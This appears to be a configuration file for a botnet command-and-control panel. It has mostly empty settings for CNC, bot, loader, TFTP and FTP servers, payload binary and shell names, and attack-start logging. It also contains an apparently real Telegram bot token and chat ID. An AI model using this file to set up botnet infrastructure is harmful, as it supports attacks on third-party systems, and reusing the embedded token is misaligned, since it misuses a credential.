# ====== DO NOT CHANGE =========
Version = "1.0.5"
# ====== DO NOT CHANGE =========



ImportTheme = ""

CncServer = ""
BotServer = ""
LoaderServer = ""
TftpServer = ""
FtpServer = ""

RootLogin = "" 

RELEASE_MODE = false

[Logs]
TelegramBotToken = "6372783424:AAHmN8RRRtoEQTnwUVUnOh4tB5jTYEsgilU" # telegram bot token (@BotFather)
TelegramChatId = "-4050740381" # telegram chat id (account id/chat id)


SaveLogsInFile = false
SendLogsInTelegram =false
PrintLogsInTerminal = false 

NewClientConnectedLog = false
NewAttackStartedLog = false

# if SaveLogsInFile = true
NewClientConnectedFileName = "" 
NewAttackStartedFileName = ""

[Payload]
    BinaryName = ""
    ShellName = ""
    FtpPassword = ""
    FtpLogin = ""


[Auth]
AllowAllIps = false

# MODULES

[Captcha]
    Enabled = false
    CaptchaLen = 0
    Letters = ""

[Animation]
    Enabled = true
    Letters = ""
    Delay = 0 # In milliseconds   

